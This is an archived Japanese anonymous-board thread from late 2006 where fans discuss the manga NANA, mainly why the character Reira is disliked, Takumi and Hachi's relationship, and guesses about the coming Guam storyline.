135 :花と名無しさん:2006/12/28(木) 23:16:16 ID:???O
>>134
そうか?
何を根拠に「確か」なんて
確信持って言ってんの?
所詮は私見でしょ
私はレイラ好きだけど、
今、叩かれてる事については
仕方がないって思ってるよ

136 :花と名無しさん:2006/12/29(金) 00:38:01 ID:???O
叩くとか何とかっていう前に生理的に嫌いなんだな。

137 :花と名無しさん:2006/12/29(金) 00:49:01 ID:???O
前はシン×レイラって本当にどうでもよかったけど、
こういう展開になってからはまたくっついて欲しいと思うようになった。

138 :花と名無しさん:2006/12/29(金) 01:24:46 ID:???0
結局レイラは何で叩かれてんの?

139 :花と名無しさん:2006/12/29(金) 04:50:02 ID:BdbKsMu+O
みんなタクミむかつかないの?

140 :花と名無しさん:2006/12/29(金) 07:43:04 ID:???0
タクミよくわかんねえ、つうかもうこの漫画わかんねw結構グダグダじゃね、もう

141 :花と名無しさん:2006/12/29(金) 08:10:05 ID:???O
しんちゃんの大人になりたくないってのは、結局りょうこさんが一番好きで依存してるってこと?

142 :花と名無しさん:2006/12/29(金) 08:16:56 ID:???O
>>138

嫉妬

143 :花と名無しさん:2006/12/29(金) 08:22:08 ID:???O
「大人になったら迎えに行く」とレイラに言えなかったからかと思った

144 :花と名無しさん:2006/12/29(金) 09:11:36 ID:???0
レイラ一番好きやな〜かわええやん

145 :花と名無しさん:2006/12/29(金) 09:14:52 ID:XzB6YaFC0
ナナ
ハチ
レン
ノブ
ヤス
シン
タクミ
レイラ
ナオキ
ヒロ



146 :花と名無しさん:2006/12/29(金) 09:22:00 ID:???O
この漫画、映画の伊藤由奈に影響で昔内容も知らずに携帯でナナとレイラ画ばっか集めてたなあ…

147 :花と名無しさん:2006/12/29(金) 09:34:32 ID:???O
男の前で泣く女うざい
レイラはヤスシンレンに甘えすぎ
一生やってろ

148 :花と名無しさん:2006/12/29(金) 12:00:28 ID:???O
女の前なら泣いてもええんか?

149 :花と名無しさん:2006/12/29(金) 12:09:38 ID:???0
>>138
>>142みたいなのに>>133のような人は不快感を持つから
単に>>136なのも多いでしょ

つーか少年買ってる時点で叩かれても仕方ないわな 

150 :花と名無しさん:2006/12/29(金) 14:29:37 ID:???O
てかグアムに行くのってナナだけなんだよね?グアムまで
サーチの記者追って来そう。まぁ舞が居るから大丈夫かと最初は
思ったがナナが舞を「美里」と呼べば記者は「妹と同じ名前?」と
興味を持つだろうし、かと言って「都築舞」って本名を聞いたら
サーチ記者はナナの婆ちゃんと都築物産の社長(舞祖父)の事を
知ってるから益々舞に興味を持ちそうだし。何かグアム編を
さらっと流すか一悶着起きるのかどっちに転ぶんだろう…

151 :花と名無しさん:2006/12/29(金) 15:37:06 ID:???O
見方書き方をかるだけで読者まであやつれる
漫画は凄いねー
私は相変わらずハチがいやだけど


152 :花と名無しさん:2006/12/29(金) 15:48:29 ID:???O
ナオキってなんであんなにいいヤツなの?

153 :花と名無しさん:2006/12/29(金) 16:28:22 ID:???0
裏ではえげつないことしてるよ

154 :花と名無しさん:2006/12/29(金) 16:49:20 ID:???O
ナオキは天ないの文太、ご近所のジローみたいなポジション

155 :花と名無しさん:2006/12/29(金) 17:11:54 ID:TsVMGEQu0
レイラは子供の頃から同性の友達いなかったんじゃない?
多分ナナと初めて対面した時みたいな対応を処世術にして
本音を話せる友達がいなかったんじゃないかなと

156 :花と名無しさん:2006/12/29(金) 18:41:51 ID:???O
レイラもナナも、同性の友達が作れなくて
ひとりの男に重い恋愛して
周りも巻き込みつつボロボロになるタイプか
ナナはハチがいるだけマシ…なのかな一応

157 :花と名無しさん:2006/12/29(金) 19:36:02 ID:???O
レイラの恋はナナほどドロドロしてないだろ
独り相撲みたいな面あるし

158 :花と名無し:2006/12/29(金) 19:56:49 ID:???O
>>157
ドロドロしてなくとも
全ての破局の元凶しょ?

159 :roo:2006/12/29(金) 22:02:40 ID:z404FUI10
中島美嘉の動画です☆あの曲もアル!!(≧▽≦)♪
http://www.pandoratv.jp/search/search.asp?src_keyword=%92%86%93%87%94%FC%89%C3&mode=total


160 :花と名無しさん:2006/12/29(金) 23:26:31 ID:???O
単行本持ってないから記憶があやふやなのですが
未来のハチってタクミに貰った指輪はめたままじゃなかった?
だとしたら離婚はしてないのかな

161 :花と名無しさん:2006/12/29(金) 23:47:35 ID:???O
>>157
一人相撲で済んでるのは相手がタクミだからだろうね。
下手に情にほだされて一線越えちゃうような男が
相手だったら、すごい泥沼にハマってそう。

>>160
ハチは指輪してるよ。婚約指輪と結婚指輪の重ね付け。
未来ではシン、ノブは指輪ナシ。ヤスは…忘れたw

162 :160:2006/12/30(土) 00:07:29 ID:???O
>>161
ありがとです


自分はハチとタクミペアが結構好き
早いとこレイラとタクミの心の関係をハッキリさせてほしい
あとナナ幸せにしたげて(・д・`)

36 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)